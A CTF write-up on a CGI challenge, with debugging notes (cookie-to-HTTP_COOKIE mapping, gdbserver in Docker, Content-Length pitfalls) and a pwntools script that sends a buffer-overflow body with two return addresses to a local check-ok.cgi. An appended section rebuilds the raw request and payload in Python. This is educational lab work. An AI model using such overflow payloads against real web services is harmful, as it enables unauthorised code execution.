CGI debugging
Published: 2023-10-04


In the second Huawei Cup I ran into a CGI challenge. The logic was simple, but the input kept going wrong, and in the end it only went through after Zhao added it byte by byte in Burp. Here I record the problems encountered during the competition.

  • First, a cookie has to be supplied to obtain privileges. The challenge reads it with getenv('HTTP_COOKIE'), but the HTTP header field is named Cookie: by default; the CGI gateway maps that header to the HTTP_COOKIE environment variable (name upper-cased, hyphens turned into underscores, HTTP_ prefixed).

  • While debugging, environment variables can be set with export NAME=value.

  • When a request is sent with the requests library, the bytes are URL-encoded and turned into a string, so raw binary bytes do not arrive as-is.

  • With Burp the bytes can be inserted one at a time.


  • When debugging with gdbserver inside Docker, a port must be published from the container for the debugger; 2333 is the debug port here. Inside the container run gdbserver host_ip:port ./program; on the host run gdb-multiarch ./program and then target remote :2333.


  • To feed bytes to the program during debugging, first write them to a file (with echo -e or Python), then use a redirect or a pipe, e.g. ./gdbserver-7.10.1-x64 :2333 ./check-ok.cgi < payload1


  • When connecting with remote, send the GET or POST packet directly. Note that for a POST the request headers and body must be separated by \r\n\r\n, and the Content-Length field must be exactly the length of the body: if it is larger than the body, the server keeps waiting for the remaining bytes, and if they never arrive it responds with a 408 error code.
from pwn import *

# elf = ELF('./getcookie.cgi')

context.log_level = 'debug'
# Windows Terminal is used to pop the gdb window when gdb.attach() is enabled.
context.terminal = 'wt.exe nt bash -c'.split()

# 1. GET /getcookie.cgi with the cookie; the CGI reads it through getenv('HTTP_COOKIE').
io = remote('127.0.0.1', 9999)
payload = b'''GET /getcookie.cgi HTTP/1.1\r\nHost: 127.0.0.1:9999\r\nUpgrade-Insecure-Requests: 1\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.41\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7\r\nReferer: http://127.0.0.1:9999/\r\nAccept-Encoding: gzip, deflate\r\nAccept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6\r\nCookie: ROOT-GOD=Every king's blood will end with a sword;\r\nConnection: close\r\n\r\n'''
# gdb.attach(io)
# pause()
io.send(payload)
print(str(io.recv(1024)))
io.close()

# 2. POST /check-ok.cgi with a raw binary body. Headers and body are separated by
#    \r\n\r\n and the Content-Length header (248) must equal len(payload1) exactly.
io = remote('127.0.0.1', 9999)
payload = b'''POST /check-ok.cgi HTTP/1.1\r\nHost: 127.0.0.1:9999\r\nContent-Length: 248\r\nCache-Control: max-age=0\r\nUpgrade-Insecure-Requests: 1\r\nOrigin: http://127.0.0.1:9999\r\nContent-Type: application/x-www-form-urlencoded\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7\r\nReferer: http://127.0.0.1:9999/\r\nAccept-Encoding: gzip, deflate\r\nAccept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6\r\n\r\n'''
# 4 + 0xe4 (228) + 8 + 8 = 248 bytes, matching the Content-Length above.
payload1 = b'cmd=' + b'a' * 0xe4 + p64(0x4032fc) + p64(0x4032E0)
io.send(payload + payload1)
# Save the body so it can also be fed to gdbserver by redirection (< payload.txt).
with open('payload.txt', 'wb') as f:
    f.write(payload1)
print(len(payload1))  # must equal the Content-Length header
print(str(io.recv(1024)))
io.interactive()
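As an added example (not the write-up's own code), the following Python gathers the three points above in one place: how the CGI gateway turns the Cookie header into HTTP_COOKIE, how a raw request with an exact Content-Length is built so the server is not left waiting (the 408 case), and how much the same binary body grows once a library percent-encodes it. The addresses and padding length are the ones from the script; everything else is constructed here.

```python
import struct
from urllib.parse import urlencode

# Constructed sample values; the addresses and padding length are the ones in the write-up.
PAD_LEN = 0xE4
ADDR_A = 0x4032FC
ADDR_B = 0x4032E0


def cgi_env_name(header):
    """Map an HTTP request header name to the CGI environment variable the script reads.

    RFC 3875: upper-case the name, replace '-' with '_' and prefix HTTP_, except
    Content-Type and Content-Length, which are exposed without the prefix.
    Hence the 'Cookie:' header is read with getenv('HTTP_COOKIE').
    """
    name = header.strip().upper().replace("-", "_")
    if name in ("CONTENT_TYPE", "CONTENT_LENGTH"):
        return name
    return "HTTP_" + name


def build_raw_request(method, path, host, body=b"", extra_headers=None):
    """Serialise one HTTP/1.1 request with CRLF line endings and a verbatim body.

    Content-Length is computed from the actual body, so the server never waits for
    bytes that will not arrive (the 408 case); nothing is percent-encoded.
    """
    headers = {"Host": host, "Connection": "close"}
    headers.update(extra_headers or {})
    if method == "POST":
        headers.setdefault("Content-Type", "application/x-www-form-urlencoded")
        headers["Content-Length"] = str(len(body))
    lines = [f"{method} {path} HTTP/1.1"] + [f"{k}: {v}" for k, v in headers.items()]
    return ("\r\n".join(lines) + "\r\n\r\n").encode("latin-1") + body


def overflow_body():
    """Form body from the write-up: 'cmd=' + 0xe4 filler bytes + two little-endian 64-bit values."""
    return b"cmd=" + b"a" * PAD_LEN + struct.pack("<QQ", ADDR_A, ADDR_B)


def urlencoded_length(body):
    """Length the same body has once a form-encoding library percent-encodes it.

    This is why sending the bytes through requests' form handling changes the data:
    0xfc, '@' (0x40) and every NUL byte each become three ASCII characters.
    """
    key, value = body.split(b"=", 1)
    return len(urlencode({key: value}))
```

The 248-byte body comes out 276 characters long after percent-encoding, so a server that expects the raw bytes would read a different payload than the one intended.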